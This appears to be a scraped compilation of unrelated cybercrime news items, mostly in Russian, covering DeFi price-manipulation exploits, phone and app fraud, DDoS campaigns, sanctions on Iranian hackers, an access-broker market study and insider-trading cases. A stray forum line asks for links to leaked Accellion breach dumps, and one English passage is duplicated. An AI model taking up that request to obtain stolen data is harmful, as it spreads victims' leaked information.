Bitdefender утверждает, что дешифратор может работать как на одной одном устройстве, так и на целых сетях, зашифрованных LockerGoga. Однако компания обращает внимание на то, что процесс расшифровки может быть прерван или не всегда работать так, как должен, поэтому пользователям рекомендуется не выключать функцию резервного копирования, встроенную в дешифровщик.
Как рассказали в саратовской полиции, 1 ноября 73-летней бабке позвонил неизвестный. Он представился сотрудником сотового оператора и предложил «оптимизировать» ей связь за счет более выгодного тарифа.
Для подключения требовалось скачать и установить приложение, ссылку на которое ей в СМС прислал звонивший. Во время установки приложуха потребовала все возможные разрешения, но это не остановило пенсионерку.
— Уже на следующий день, зайдя в приложение банка, старая обнаружила, что с ее карты просто уходит кэш. В панике она пыталась что-то сделать, но не успела. Частями у нее свистнули 550 тысяч рублей. Возбуждено дело по ст. 159 ч.2 и ч.3.
Правоохранители шлют киберпреступникам «письма счастья», в которых призывают навсегда завязать с незаконной деятельностью.
Ещё в 2021 году голландские правоохранители разместили ряд сообщений на русскоязычных и англоязычных хакерских форумах, включая RaidForums и XSS, в которых сообщили злоумышленникам, что полиция наблюдает за их активностью.
Any Links for the data dumps of accellion data
Breach?
Проект децентрализованного финансирования (DeFi) Yearn.Finance подвергся эксплойту, в ходе которого хранилище v1 yDAI потеряло цифровые активы на сумму около $11 млн. Эксплойт уже ликвидирован.
Проект Yearn.Finance позволяет заниматься «доходным фермерством»: пользователи заносят в пулы свои цифровые активы и получают за это проценты. Недавно платформа обновила свои хранилища, однако смарт-контракты остались без изменений. По данным DeFi Pulse, проекту Yearn.Finance «доверены» активы на сумму $500 млн.
Об утечках средств начали сообщать пользователи каналов Yearn Discord и Telegram 4 февраля, во второй половине дня. Один из пользователей написал: «Кто-нибудь знает, почему у меня написано, что я потерял тысячи DAI за последние несколько минут?» Кроме того, в пользовательском интерфейсе хранилища на сайте Yearn.Finance появилось уведомление о потерях в размере 1 059%.
Специалисты Yearn.Finance также сообщили об атаке в социальной сети Twitter. Позднее разработчик под псевдонимом banteg написал, что организатору атаки удалось уйти с $2.8 млн, а хранилище v1 yDAI потеряло активы на сумму около $11 млн. Депозиты в DAI, TUSD, USDC и USDT деактивированы на время проведения расследования.
После того, как стало известно об атаке, пользователь Twitter UniWhales DAO сообщил о крупной продаже YFI за ETH. Криптовалюта просела в цене более чем на $5 000 – с $34 979 до $29 580. Затем курс YFI постепенно восстановился до $31 500.
На момент атаки все средства были размещены в 3pool на платформе Curve. В 3pool находятся DAI, USDT и USDC, что позволяет пользователям обменивать стейблкоины на другие активы с ограниченным проскальзыванием.
По словам генерального директора Curve Михаила Егорова, кто-то вложил «кучу средств» в 3pool, чтобы манипулировать ценой DAI. Хранилище полагалось на эту цену, а после атаки контракт был расторгнут. Такие действия повторялись несколько раз, и злоумышленнику удалось забрать заемные средства.
Егоров добавил, что эта проблема хорошо известна, и поделился своими соображениями с командой Yearn.Finance о том, каким образом можно предотвратить подобные уязвимости.
Напомним, что в сентябре основатель Yearn.Finance Андре Кронье (Andre Cronje) запустил игровой протокол Eminence, однако из-за критической уязвимости инвесторы потеряли $15 млн.
Установлены участники DDoS-атак на интернет-ресурсы БГУ и БГМУ, организованных киберпреступниками. Об этом сообщили в МВД.
"Осенью 2020 года Белорусский государственный университет и Белорусский государственный медицинский университет подверглись массированным кибератакам, организованным злоумышленниками, именующими себя "кибер-партизаны". В результате атак доступ к интернет-ресурсам вузов был временно недоступен: пользователи не могли воспользоваться онлайн-сервисами, дистанционной системой обучения и прочими информационными возможностями сайтов. Вузам был причинен не только материальный, но и репутационный ущерб", - рассказали в МВД.
Вначале злоумышленники создали опрос, в котором предложили пользователям выбрать цель для массированной кибератаки из перечня государственных организаций. Затем для осуществления DDoS-атаки создали специальный сервис и предложили пользователям стать участниками автоматической бот-сети для атаки на госресурсы.
"Кибер-партизаны" призвали студентов заявить о своей гражданской позиции, "пофлешмобить" и "хайпануть", сорвать учебный процесс. При этом они лукавили, утверждая, что участие в атаке анонимно и не вызовет правовых последствий. А позже они и вовсе переложили всю ответственность на самих участников, - отметили в ведомстве. - Массовость кибератакам обеспечило тиражирование информации деструктивными интернет-сообществами. Чем больше пользователей вовлекалось в этот процесс, тем больше запросов направлялось на сайты: не справляясь с возросшей нагрузкой, те отключались".
Пострадавшие от атак вузы обратились в органы внутренних дел. В результате оперативно-технических мероприятий, проведенных оперативниками главного управления по противодействию киберпреступности криминальной милиции МВД Беларуси, установлены тысячи участников кибератак. В основном это студенты, которые не осознавали всю серьезность последствий, а принимали участие в атаках, будучи введенными в заблуждение "кибер-партизанами".
В бот-сети оказались втянуты и некоторые IT-компании - резиденты Парка высоких технологий, чьи отдельные сотрудники опрометчиво поддались на провокацию. Руководству этих компаний предстоит полностью возместить нанесенный ущерб вузам.
По факту DDoS-атак следователи возбудили уголовное дело.
Мошенническую АТС выявили полицейские в Алматы, сообщает Polisia.kz.
Спецоперацию “Antifraud” провели сотрудники “Cyberpol” криминальной полиции Алматы совместно с Центром по борьбе с киберпреступностью МВД РК.
Задержан 30-летний приезжий из Павлодара, в съемном арендованном офисе которого обнаружен SIM-box с 512 слотами, а также 1 620 SIM-карт.
— Данное оборудование используется интернет-мошенниками для активации различных интернет-сервисов и мессенджеров, оставаясь при этом анонимными. Кроме того, оно используются для регистрации аккаунтов, через которые в последующем мошенники обзванивают казахстанцев, находясь фактически в другой стране. Задержанный сообщил, что согласился на работу, которая заключается в настройке и подключения данного оборудования и в периодической замене SIM-карт в слотах. Эти показания будут тщательно проверены в рамках уголовного дела, возбужденного по ст. 213 УК РК, — информировал начальник управления криминальной полиции ДП города Алматы Максат Канапяев.
Разоблачили противоправную деятельность 27-летнего фигуранта сотрудники Голосеевского управления полиции, совместно с оперативниками Департамента внутренней безопасности Украины во взаимодействии с работниками Департамента киберполиции, при содействии Главного сервисного центра МВД и процессуального руководства Голосеевской окружной прокуратуры.
Досудебным расследованием установлено, что злоумышленник через телеграм-бот подыскивал «клиентов», которые намеревались в кратчайшие сроки взять талон на получение услуг сервисных центров МВД.
В дальнейшем, мужчина с помощью собственно созданной программы вмешивался в работу электронно-коммуникационной системы госучреждения и таким образом «перехватывал» рабочую сессию других пользователей сайта для оформления талона на имя своего клиента. Таким образом, электронная запись реальных пользователей блокировалась, вместо нее создавалась очередь для выбранного заказчика.
Цена за один талон электронной очереди стартовала от 1000 гривен. За день мужчина на заказ генерировал не менее полусотни талонов, а расчет осуществлялся в безналичной форме на банковские карточки.
Полицейские задержали фигуранта в порядке ст. 208 Уголовно-процессуального кодекса Украины. Им оказался ранее не судимый житель Киевщины. По месту жительства мужчины следователи провели санкционированный обыск, в результате которого изъяли компьютерную технику на которой установлены программы, по которым действовал злоумышленник и денежные средства.
Следователи сообщили задержанному о подозрении по ч. 5 ст. 361 Уголовного Кодекса Украины - несанкционированное вмешательство в работу информационно- коммуникационных систем, повлекшее нарушение установленного порядка ее маршрутизации, совершенное в условиях военного положения.
Сейчас суд избрал подозреваемому меру пресечения в виде круглосуточного домашнего ареста. Мужчине грозит лишением свободы на срок до пятнадцати лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет.
• Source:
Минфин раскрыло действия правительственных хакеров Ирана против госструктур США.
Министерство финансов США объявило о введении санкций против четырех граждан Ирана и двух компаний за участие в кибератаках против американских правительственных учреждений, оборонных подрядчиков и частных компаний.
Санкции затронули две оборонные компании — Mehrsam Andisheh Saz Nik (MASN) и Dadeh Afzar Arman (DAA), которые действовали в интересах Киберкомандования Стражей Исламской Революции (IRGC-CEC).
Алиреза Шафи Насаб и Реза Каземифар Рахман, работая на MASN, осуществляли нападения на американские организации. Каземифар также участвовал в фишинговых атаках на Минфин США. Хосейн Мохаммад Харуни, еще один из санкционированных иранцев, атаковал Минфин и другие американские учреждения, используя техники социальной инженерии.
Комеил Барадаран Салмани был связан с атаками, координированными через MASN, DAA и другие оборонные компании IRGC-CEC. Все активы и интересы указанных лиц и организаций в США заморожены, а любые сделки с их активами требуют разрешения Управления по контролю за иностранными активами (OFAC).
Госдепартамент США также объявил о награде в размере до $10 млн. за информацию
о Каземифаре, Салмани, Харуни, а также о компаниях MASN и DAA.
Объявление о награде за информацию о местонахождении иранских хакеров
Также были разглашены обвинения против Каземифара, Салмани и Харуни за участие в атаках против американских государственных агентств и частных субъектов в период с 2016 по 2021 год. Алиреза Шафи Насаб был обвинен в феврале за атаки на американских оборонных подрядчиков и другие компании.
sc:
home.treasury.gov/news/press-releases/jy2292
twitter.com/RFJ_USA/status/1782824365127500272
The National Coordination Centre for Cybersecurity (NCCC) decided to restrict the use of Telegram in government agencies, military formations, and critical infrastructure facilities.
Лендинговый протокол Hundred Finance подвергся хакерской атаке, нацеленной на пулы в сети L2-решения Optimism. Разработчики оценили сумму ущерба примерно в $7 млн.
It looks that Hundred got hacked on #Optimism. We will update when there is
more information to it.
— Hundred Finance (@HundredFinance) April 15,
2023
Согласно PeckShield, неизвестный манипулировал ценой токена hWBTC, чтобы опустошить кредитный пул:
«Основная причина заключается в том, что атакующий пожертвовал 200 WBTC, чтобы взвинтить обменный курс hWBTC, так что даже крошечная сумма (2 Wei) может опустошить текущие лендинговые пулы».
Средняя стоимость доступа к взломанной компании на хакерских биржах составляет $5,4 тыс., показало исследование специалистов по информационной безопасности из израильской компании Kela. Аналитики изучили порядка 1 тыс. объявлений в даркнете. Большая часть лотов — доступы к сетям американских, французских, английских, австралийских и канадских компаний. При этом в топ-10 не попали ни Россия, ни страны СНГ. Эксперты объяснили это тем, что исследователи, скорее всего, собирали статистику по русскоязычным хакерским форумам, которые входят в число старейших теневых «маркетплейсов». А на них не принято публиковать объявления с доступами к местным компаниям.
Грязные деньги
Специалисты компании Kela проанализировали более 1 тыс. объявлений о продаже начального доступа к внутренним компьютерным сетям взломанных организаций, опубликованных с июля 2020 года по июнь 2021-го. Средняя цена лота — около $5,4 тыс., медианная (половина предложений ниже показателя, половина — выше) — $1 тыс., показало исследование.
Как правило, доступом называют логин и пароль от аккаунта сотрудника компании, который открывает для злоумышленников вход в компьютерную инфраструктуру организации. Также как доступ может продаваться программное обеспечение для эксплуатации уязвимостей в сети жертвы. Начальным доступ называют потому, что с него можно начать хакерскую атаку, объяснил старший эксперт по кибербезопасности «Лаборатории Касперского» Денис Легезо. По словам других российских специалистов, чаще всего доступы покупают операторы вирусов- шифровальщиков.
В Kela отметили, что ценообразование зависит от выручки взломанной компании: этот показатель определяет и номинал выкупа, который могут запросить хакеры. Поэтому доступы к небольшим фирмам стоят $100–200, а самые дорогие лоты — в тысячи раз больше. Самый высокий ценник, который встретился экспертам, был равен 12 биткоинам (примерно $540 тыс. по курсу на 18 августа). Столько брокеры просили за доступ к неназванной австралийской компании с годовым доходом $500 млн. Второй по дороговизне доступ стоил 5 биткоинов (примерно $225 тыс.). За эту сумму продавался аккаунт в системе удаленного доступа к рабочему столу ConnectWise Control из сети одной из американских IT-компаний. Тройку самых дорогих доступов замкнул лот за $100 тыс., обещавший проход в сеть некоего правительственного ведомства Мексики.
По данным российской компании Bi.Zone, доступы стоят от $100 до $20 тыс. Специалисты фирмы проанализировали более 1,5 тыс. объявлений.
В среднем доступ в Сети продают за $4,6 тыс., дала свою оценку аналитик Positive Technologies Яна Юракова. По ее словам, цена снижается: на черном рынке больше брокеров, многие из которых, вероятнее всего, в силу неопытности предлагают дешевые лоты и тем самым влияют на статистику.
— В промежутке с 2017 года по I квартал 2020 года доля объявлений, где была указана цена менее $1 тыс. за доступ, составляла 15%, а в период со II квартала 2020 года по I квартал 2021 года она составила уже 45%. Доля дорогих доступов, стоимость которых превышает $5 тыс., в сравнении с тем же периодом сократилась практически в два раза, — рассказала эксперт.
Не всем так просто
По данным Kela, аккаунты с правами администратора на хакерских форумах в среднем стоят в 10 раз больше, чем доступ с правами рядового пользователя. Денис Легезо объясняет это тем, что аккаунт администратора позволяет злоумышленникам получить полный доступ к сети компании сразу. При покупке учетной записи рядового сотрудника хакеру придется проделать работу по повышению привилегий в корпоративной сети.
— Например, такой пользователь не сможет сделать выгрузку из базы данных, изменить настройки домена так, как нужно атакующим, и т.д. Учетная запись администратора домена дает возможность сделать всё это без дальнейшего повышения привилегий, — пояснил эксперт.
Права администраторов на черном рынке высоко ценятся еще и потому, что процедура повышения привилегий связана с рисками обнаружения деятельности злоумышленников в сети и требует высокой компетенции, добавила Яна Юракова.
Часто брокеры получают доступы к сетям компаний после рассылки фишинговых писем, отметил Денис Легезо. Помимо социальной инженерии, злоумышленники пользуются сетевыми уязвимостями на устройствах компаний. Деятельности брокеров также способствуют и инсайдеры внутри организаций, уточнил независимый исследователь информационной безопасности и автор Telegram-канала Russian OSINT Сергей Иванов.
— Есть люди в крупных компаниях, которые за деньги помогают киберпреступникам получить доступ. Таким образом они обеспечивают себе безбедную старость, — сказал эксперт.
Антирейтинг
Специалисты Kela составили рейтинг стран, доступы к компаниям из которых чаще всего продают в даркнете. С большим отрывом топ возглавили США: американских организаций касается 27,9% объявлений. На второй строчке — Франция с показателем 6,1%. Следом идут Великобритания и Австралия с долями по 4%. Пятерку лидеров замкнула Канада с результатом 3,8%. Затем идут Италия (3,5%), Бразилия (3,2%), Испания и Германия (по 2,3%), ОАЭ (2%).
Россия и страны СНГ могли не войти в топ-10, поскольку на русскоязычных хакерских форумах не принято работать с местными компаниями, отметили исследователи. Но именно эти площадки в качестве теневых «маркетплейсов» привлекают наибольшее внимание специалистов по информационной безопасности, пояснил руководитель департамента информационно-аналитических исследований компании T.Hunter Игорь Бедеров.
— Некоторые старейшие русскоязычные форумы с течением времени агрегировали большую пользовательскую базу как русскоязычных, так и других пользователей. В основном потому, что они долго существуют. Большинство англоязычных «маркетплейсов» не выдерживали и трети срока существования в сравнении с ними, — сказал эксперт.
Испаноговорящие и азиатские хакерские сообщества тоже примечательны, но им исследователи и аналитики посвящают сравнительно мало внимания, добавил он.
Русскоязычные форумы могут быть платформами для крупнейших бирж начального доступа, не исключил Сергей Иванов. Но даже если это не так, анализ этих ресурсов позволяет понять ценовую динамику на рынке, уверен он.
В сети появился эксплоит для уязвимости в устройствах Qnap NAS, на которых работает система управления видеонаблюдением Surveillance Station.
Проблема связана с повреждением информации в памяти и влияет на устройства, работающие с Surveillance Station версий 5.1.5.4.2 и 5.1.5.3.2. Баг был устранен разработчиками в феврале этого года с релизом Surveillance Station версии 5.1.5.4.3 для 64-разрядных NAS на процессорах ARM и x86, а также в версии 5.1.5.3.3 для 32-разрядных NAS с процессором ARM и x86.
Уязвимость имеет идентификатор CVE-2020-2501 и представляет собой переполнение буфера стека, которым удаленные злоумышленники могут злоупотреблять для выполнения кода в уязвимой системе без аутентификации.
На этой неделе компания SSD Secure Disclosure опубликовала детали проблемы, а также PoC-эксплоит. Согласно SSD, уязвимость сосредоточена вокруг небезопасного использования данных, предоставленных пользователем. Злоумышленник может отправить специально созданный HTTP-запрос на уязвимое устройство, что приведет к переполнению буфера, используемого модулем Surveillance Station, и в итоге станет возможно выполнение произвольного кода.
Источник: xakep.ru/2021/04/15/surveillance-station-rce/
ApeRocket, агрегатор сервисов фарминга децентрализованного финансирования (DeFi), пострадал от двух атак с использованием быстрых кредитов и понес убытки на $1.26 млн.
Согласно статье в блоге разработчиков, атаки произошли на протокол ApeRocket на Binance и его форк на Polygon с разницей в несколько часов в эту среду. Две атаки с использованием быстрых кредитов были проведены через Aave и PancakeSwap, а общие убытки от них составили $1.26 млн в криптоактивах.
В обоих случаях значительные суммы были заимствованы в AAVE и CAKE – хакер держал более 99% денег в хранилищах двух протоколов. Затем в контракт хранилища были отправлены крупные суммы, что привело к выпуску большого количества токенов ApeRocket SPACE.
После этого заемные деньги были возвращены, а злоумышленник продал свои сгенерированные токены, что привело к падению цены SPACE примерно на 63%. Выпуск токенов временно прекращен, пока разработчики протокола решают вопрос о компенсации пользователям.
• Source: https://aperocket.medium.com/moving-forward-24b9ae22c428
The Department of Homeland Security is moving to regulate cybersecurity in the pipeline industry for the first time in an effort to prevent a repeat of [a major computer attack](https://www.washingtonpost.com/business/2021/05/08/cyber-attack- colonial-pipeline/?itid=lk_inline_manual_2) that crippled nearly half the East Coast’s fuel supply this month — an incident that highlighted the vulnerability of critical infrastructure to online attacks.
The Transportation Security Administration, a DHS unit, will issue a security
directive this week requiring pipeline companies to report cyber incidents to
federal authorities, senior DHS officials said. It will follow up in coming
weeks with a more robust set of mandatory rules for how pipeline companies
must safeguard their systems against cyberattacks and the steps they should
take if they are hacked, the officials said. The agency has offered only
voluntary guidelines in the past.
The ransomware attack that led Colonial Pipeline to shutter its pipeline for
11 days this month prompted gasoline shortages and panic buying in the
southeastern United States, including in the nation’s capital. Had it gone on
much longer, it could have affected airlines, mass transit and chemical
refineries that rely on diesel fuel. Colonial’s chief executive has said [the
company paid](https://www.washingtonpost.com/business/2021/05/19/colonial-
pipeline-ransom-joseph-blunt/?itid=lk_inline_manual_5) $4.4 million to foreign
hackers to release its systems.
[Colonial Pipeline CEO says paying $4.4 million ransom was ‘the right thing to
do for the
country’](https://www.washingtonpost.com/business/2021/05/19/colonial-
pipeline-ransom-joseph-blunt/?itid=lk_interstitial_manual_6)
The cyberattack spurred DHS Secretary Alejandro Mayorkas and other top
officials to consider how they could use existing TSA powers to bring change
to the industry, said the officials.
Gas stations in the Southeastern U.S. saw long lines on May 10, as Colonial
Pipeline tries to restore operations following a ransomware attack. (The
Washington Post)
“The Biden administration is taking further action to better secure our
nation’s critical infrastructure,” DHS spokeswoman Sarah Peck said in a
statement. “TSA, in close collaboration with [the Cybersecurity and
Infrastructure Security Agency], is coordinating with companies in the
pipeline sector to ensure they are taking all necessary steps to increase
their resilience to cyber threats and secure their systems.”
That TSA handles pipeline security at all is an artifact of the post-Sept. 11,
2001, reorganization of the federal government. Originally, the Department of
Transportation oversaw pipelines, which were seen as a mode of transportation
— whether conveying fuel, gas or chemicals. Then in 2002, responsibility for
pipeline security was moved to the newly created TSA, which was given
statutory authority to secure surface transportation. DOT, however, still is
in charge of safety of the actual pipes — or ensuring they do not fail.
TSA, though, mostly focused on physical security of pipelines, safeguarding
them against terrorist attacks or sabotage. It was only in 2010 that the first
set of cyber-related guidelines was issued. The guidelines were updated in
2018 but still fall far short of what many experts say is needed.
Most critical infrastructure sectors — whether dams, health care or wastewater
systems — do not have mandatory cyber standards. A handful do, including bulk
electric power and nuclear plants. A congressional effort to institute
mandatory requirements in 2012 failed in the face of strong U.S. Chamber of
Commerce opposition.
That TSA handles pipeline security at all is an artifact of the post-Sept. 11,
2001, reorganization of the federal government. Originally, the Department of
Transportation oversaw pipelines, which were seen as a mode of transportation
— whether conveying fuel, gas or chemicals. Then in 2002, responsibility for
pipeline security was moved to the newly created TSA, which was given
statutory authority to secure surface transportation. DOT, however, still is
in charge of safety of the actual pipes — or ensuring they do not fail.
TSA, though, mostly focused on physical security of pipelines, safeguarding
them against terrorist attacks or sabotage. It was only in 2010 that the first
set of cyber-related guidelines was issued. The guidelines were updated in
2018 but still fall far short of what many experts say is needed.
Most critical infrastructure sectors — whether dams, health care or wastewater
systems — do not have mandatory cyber standards. A handful do, including bulk
electric power and nuclear plants. A congressional effort to institute
mandatory requirements in 2012 failed in the face of strong U.S. Chamber of
Commerce opposition.
Житель американского штата Массачусетс был арестован и обвинен в тщательно продуманной схеме банковского мошенничества, благодаря которой ему удалось обналичить более 100 поддельных чеков на общую сумму около одного миллиона долларов. По данным Fox News, афера 41-летнего Хуэй Чжана (Hui Zhang) закончилась для него визитом сотрудников Федерального бюро расследований.
Следствие полагает, что с июня 2020 года по май 2022-го Чжан открывал мошеннические банковские счета под вымышленными именами и внес на них данные 114 фальшивых чеков. После этого он снимал деньги в банкоматах, что удалось доказать благодаря камерам видеонаблюдения и татуировке американца не левой руке.
Связать отдельные эпизоды в одно большое дело позволила невнимательность афериста к деталям. В частности, он, судя по всему, игнорировал необходимость использования VPN-сервисов, поскольку все мошеннические счета были открыты с одного IP-адреса, к месту регистрации которого и прибыл наряд федералов.
Теперь Чжану грозит до 30 лет заключения. Расследование его действий продолжается.
source: foxnews.com/us/massachusetts-man-arrested-1m-bank-fraud-scheme- involving-more-than-100-counterfeit-checks
В Коми сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий МВД России совместно с коллегами из республиканской полиции в результате оперативно-розыскных мероприятий вышли на след и задержали 17-летнего жителя Ухты, подозреваемого в распространении компьютерных программ, предназначенных для несанкционированного уничтожения, блокирования, модификации и копирования информации, а также нейтрализации средств её защиты.
Как предварительно установили полицейские, подросток создал в популярном мессенджере канал, где с августа по октябрь 2023 года продавал вредоносный софт, позволяющий дистанционно управлять чужим компьютерным оборудованием. Так, вирусная программа позволяла получать снимки с экрана монитора, всю информацию об аккаунтах в социальных сетях, в том числе логины и пароли, данные криптокошельков и даже сведения о нажатых пользователем клавишах клавиатуры.
В результате обыска по месту жительства несовершеннолетнего оперативники обнаружили и изъяли его ноутбук, сотовые телефоны, роутер, электронный носитель информации и банковские карты.
Следственным отделом СЧ СУ МВД по Республике Коми в отношении подозреваемого возбуждено уголовное дело по признакам преступления, предусмотренного частью 2 статьи 273 Уголовного кодекса Российской Федерации. На время его расследования несовершеннолетний фигурант отпущен под подписку о невыезде и надлежащем поведении.
Как сообщили 3 апреля в федеральной прокуратуре Южного округа штата Нью-Йорк в Манхэттене, русскоязычные братья-американцы Михаил и Джералд Шварцманы признали себя виновными в мошенничестве с ценными бумагами, за что положено до 20 лет тюрьмы, но приговор, который судья Льюис Лайман назначил на, соответственно, 2 и 3 часа дня 17 июля, им будет гораздо короче.
Ожидается, что Михаил получит от 4 до 5 лет лишения свободы, а Джералд от 3 до 4 лет. Помимо того старший Шварцман внесет в федеральную казну 18,2 млн долларов незаконной прибыли, а младший 4,6 млн. В доход государства также будут обращены принадлежавшие Михаилу Шварцману счет в банке Saudi National, яхта Provocateur и три прикрепленных к ней гидроцикла. 53-летний Михаил Шварцман живет во Флориде, а точнее в Айсл-Бич, элитном районе Майами, а 46-летний Джералд в майамском пригороде Авентура. Предваряя пресс-релиз, прокуратура сообщила, что братья Шварцман «сделали больше 22 млн долларов незаконной прибыли торговлей (акциями) до объявления, что компания Digital World Acquisition Company (“DWAC”) сольётся с принадлежащей Доналду Трампу компанией Media & Technology Group (“Trump Media”). Сразу отмечу, что ни к компании Трампа, ни к нему самому никаких претензий у прокуратуры нет, а упомянули ее ради объективного красного словца, которое с восторгом подхватили наши левые СМИ.
Братьев Шварцман арестовали в июне прошлого года, обвинили и освободили под залоги старшего в 20 млн долларов, а младшего в 20 млн недвижимостью. Вместе с ними по делу шел и был арестован 53-летний Борис-Брюс Гарелик из города Форт- Лодердейл в получасе езды от Майами, за освобождение которого суд назначил всего 100 тысяч. Гарелик был сначала инвестором, с сентября 2021 года стал членом совета директоров DWAC и тоже знал о предстоящем слиянии с Trump Media. Заработал он на этом меньше 50 тыс. долларов и суд над ним назначен на конец апреля. То, в чем признали себя виновными братья Шварцман, называется инсайдерской торговлей информацией (material, non-public information или “MNPI”), и, как пояснил в пресс-релизе федеральный манхэттенский прокурор Дамиан Уильямс, они «получали конфиденциальную внутреннюю информацию о предстоящем слиянии DWAC и Trump Media и пользовались этой информацией для выгодных, но незаконных операций на бирже. Инсайдерская торговля - это явный и чистый обман, и сегодняшние обвинения должны напомнить всем, кого подмывает посягнуть на честность биржевых операций, что это их проездной билет в тюрьму».
О Михаиле Шварцмане известно, что в Майами он был владельцем ночного клуба, а в 2013 году основал венчурную компанию Rocket Capital, где его младший брат был директором по инвестициям. Из 15 страниц обвинения следует, что с июня по ноябрь 2021 года сообщники приобрели акции DWAC на миллионы долларов, а также делились полученной информацией с друзьями и сотрудниками, которые также купили десятки тысяч акций до объявления о слиянии. Помимо обмена информацией MNPI с членами семьи, они раскрыли ее друзьям во время поездки в Лас-Вегас, соседям Михаила Шварцмана и сотрудникам Джеральда Шварцмана в его мебельном магазине. После объявления о слиянии DWAC и медиагруппы Трампа в октябре 2021 года цена акций резко подскочила с 10 до 175 долларов. Дональда Трампа, повторяю, причастным к этому не считают, но дело о торговле информацией MNPI о слиянии его компании немедленно пристегнули к другим судебным тяжбам Трампа, который претендует на возвращение в Белый дом после ноябрьских выборов. Отмечается, что акции Trump Media & Technology Group, куда, кстати, входит новостная платформа Трампа Truth Social, подорожали, и хотя за прошлый год подешевели на 58 млн долларов, все равно принесли инвесторам 4 млн долларов, а общая стоимость акций его меди-группы на прошлую среду составляла 5,7 млрд долларов.
Британская газета The Guar-dian 3 апреля в связи с признаниями братьями Шварцман вины сообщила, что компания Трампа брала экстренные кредиты у ES Family Trust, за которым стоит российско-американский бизнесмен Антон Постольников — фигурант расследования ФБР и министерства внутренней безопасности. Газета поясняет, что в 2021 году Trump Media оказалась в сложной ситуации и была вынуждена взять экстренные кредиты, в том числе у ES Family Trust. Траст открыл счет в небольшом банке Paxum Bank на карибском острове Доминика, «который больше всего известен предоставлением финансовых услуг порноиндустрии». Судя по утечкам документов, ES Family Trust действовал как фирма-прокладка совладельца Paxum Bank Антона Постольникова, проживающего в США племянника Александра Смирнова, бывшего замминистра юстиции Росси, затем пять лет начальника Управления президента России по общественным связям, а сейчас гендиректора «Росморпорта». В деле братьев Шварцман и Гарелика есть «емелька», то есть электронное письмо, которое Гарелик отправил Постольникову 24 июня 2021 года, примерно за четыре месяца до объявления о слиянии. «Антон, отлично провели время вчера вечером! - написано там. - В продолжение темы SPAC медиагруппы Трампа, о которой мы упоминали. Сделка будет завершена на этой неделе. Пожалуйста, дайте нам знать, если вы заинтересованы в инвестициях…». Копия «емельки» была отправлена Михаилу Шварцману.
The Guardian отмечает, что Paxum Bank не может предоставлять кредиты в США из- за отсутствия банковской лицензии, поэтому Постольников мог использовать прокладку, «чтобы помочь спасти Trump Media», которой было тяжело получить кредиты после событий у вашингтонского Капитолия 6 января 2021 года. Пока Постольникову не предъявлены обвинения, и нет признаков того, что Трамп или Trump Media знали о характере кредитов, кроме того, что они были «непрозрачными», но та же The Guardian пишет, что деньги ES Family Trust помогли медиакомпании Трампа «удержаться на плаву» в 2022 году, а сейчас Трамп может получить миллиарды долларов от слияния Trump Media and Technology Group и компании Digital World Acquisition Corporation, которая выкупила материнскую компанию Truth Social. Представитель Trump Media заявил, что The Guardian «распространяет ложную версию» о связях компании с Россией. Ну, к этому Трампу не привыкать- расследование его предполагаемой связи с Кремлем длилась почти два год и стоило почти 32 млн долларов.
В сентябре прошлого года по смежному делу о той же инсайдерской торговле в той же манхэттенской федеральной прокуратуре признал себя виновным 45-летний врач Слава, он же Стэнли, Каплан из поселка Хоупвелл-Джанкшн в нью-йоркском графстве Датчес в 68 милях на север от Манхэттена. Его сообщник, 44-летний американец Джозеф Дюпон из Массачусетса, также признал себя виновным в том, что они с Капланом заработали больше 2,2 млн долларов на покупке и продаже акций фармацевтической компании Portola Pharmaceuticals, Inc. Судья Грегори Вудс назначил приговоры обоим на 5 января 2024 года, одному на час в другому на три часа дня. Вместе с Капланом и Дюпоном по их делу проходят Шон Кронин и Пол Фридман, а всех четверых обвиняют в том, что они заработали больше 4 млн долларов на покупке и продаже акций фармацевтической компании Portola Pharmaceuticals, Inc. В 2020 году Слава Каплан и Джозеф Дюпон с сообщниками участвовали в инсайдерской торговле в связи со слиянием Portola Pharmaceuticals и Alexion Pharmaceuticals, где Дюпон был вице-президентом. 31 января 2020 он узнал о предполагаемом слиянии, а в апреле предоставил документы об этом своему другу детства, чтобы тот мог на этом заработать. Друг Дюпона, в свою очередь, рассказал об этом Славе Каплану, который тоже знал Дюпона, и попросил его о помощи в разработке стратегии незаконного заработка. Каплан поделился полученной информацией со своим родственником, а также с другом и коллегой, и в итоге все купили акции Alexion до объявления о слияния, а 5 мая 2020 года, после объявления, продали их с большим барышом. В частности, в обвинении указано, что 26 апреля 2020 года 2020 года Пол Фридман отправил Славе Каплану эсэмэску со словом «lekarstva», а тот ответил русским словом «Да».
На суде его адвокаты Рэйчел Маймин и Логан Викери просили приговорить Славу Каплана к условному наказанию, поясняя, что он попал в США из советской Белоруссии, когда ему было 15 лет, и стал законопослушным американцем, которому «сейчас особенно стыдно за то, что он нарушил закон страны, которая спасла его жизнь». В своем ходатайстве адвокаты отметили, что в разгар пандемии Covid-19 врач Каплан работал по 80 часов в неделю в трех больницах, был в отрыве от семьи из-за карантина, и ему приходилось работать среди умерших, для которых не было места в моргах, отчего он мог заразиться и тоже умереть. С учетом этого судья Вудс сдержал слово и 5 января приговорил Каплана к 5 месяцам лишения свободы и трем годам надзора после отсидки, обязав вернуть народу его новой родины 475 054 неправедно нажитых доллара.
Мошенническую схему разоблачили сотрудники управления противодействия
киберпреступлениям Харьковщины совместно со следственным управлением областной
полиции.
30-летний организатор преступной группы и несколько исполнителей отбывают
наказание в местах лишения свободы, откуда координируют деятельность других
членов преступной группы, находящихся на свободе.
Злоумышленники оформляли фиктивные заказы в интернет-магазинах с отправкой наложенным платежом. Далее звонили продавцам, представляясь сотрудниками почтовой компании, и выпрашивали коды доступа к личным кабинетам. После - в личных кабинетах на сайте почтовой службы подменяли реквизиты для оплаты экспресс-накладных. В результате деньги покупателей поступали на подконтрольные злоумышленникам счета.
По предварительным подсчетам, клиентам компании нанесен более миллиона гривен убытков.
Правоохранители провели 24 обыска в домах фигурантов и по местам отбытия наказания в Харькове и Сумской области. По результатам изъята компьютерная техника, мобильные телефоны, банковские карты, сим-карты.
Трое членов группы задержаны в порядке ст. 208 Уголовного процессуального кодекса Украины. Сейчас правоохранители устанавливают всех причастных к незаконной деятельности.
